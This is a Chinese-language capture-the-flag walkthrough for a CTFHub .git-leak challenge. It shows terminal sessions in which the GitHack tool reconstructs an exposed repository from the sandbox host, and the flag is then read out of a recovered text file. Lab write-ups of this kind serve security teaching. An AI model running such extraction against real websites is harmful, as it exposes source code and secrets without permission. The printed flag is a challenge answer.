当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。请尝试使用BugScanTeam的GitHack完成本题
第一步
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# python2 GitHack.py http://challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com:10800/.git
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com:10800/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
正克隆到 '/root/Downloads/GitHack-master/dist/challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800'...
fatal: 仓库 'http://challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com:10800/.git/' 未找到
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com:10800/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[!] Initialize Git Error: 提示:使用 'master' 作为初始分支的名称。这个默认分支名称可能会更改。要在新仓库中
提示:配置使用初始分支名,并消除这条警告,请执行:
提示:
提示: git config --global init.defaultBranch <名称>
提示:
提示:除了 'master' 之外,通常选定的名字有 'main'、'trunk' 和 'development'。
提示:可以通过以下命令重命名刚创建的分支:
提示:
提示: git branch -m <name>
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/dd/99d7645add1d9deea9131de63abf71b6fea090
[*] objects/20/ed8edd5b2b6b740a88558c9831785aa2a40d20
[*] objects/41/fd37be56e0df54d1c8148445d51f95bfbb0d2e
[*] objects/01/2ae1fc6b838a345b689ae6bb4ec0edfd517a64
[*] objects/90/71e0a24f654c88aa97a2273ca595e301b7ada5
[*] objects/ef/26e55277dadb891fc546e3055d8e065db0c8fe
[*] objects/2c/59e3024e3bc350976778204928a21d9ff42d01
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success
[+] Clone Success. Dist File : /root/Downloads/GitHack-master/dist/challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800
第二步
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# ls
data dist GitHack.py lib LICENSE README.md
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# cd dist
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist]
└─# ls
challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist]
└─# cd challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800
第三步
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800]
└─# ls
50x.html 6949130029149.txt index.html
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800]
└─# cat index.html
<html>
<head>
<meta charset="UTF-8" />
<title>CTFHub .git leakage</title>
</head>
<body>
<h1>Where is flag?</h1>
</body>
</html>
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800]
└─# cat 6949130029149.txt
ctfhub{406e5a271b8619971ec28b3d}
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-bdacaa8dd820bf1c.sandbox.ctfhub.com_10800]
└─#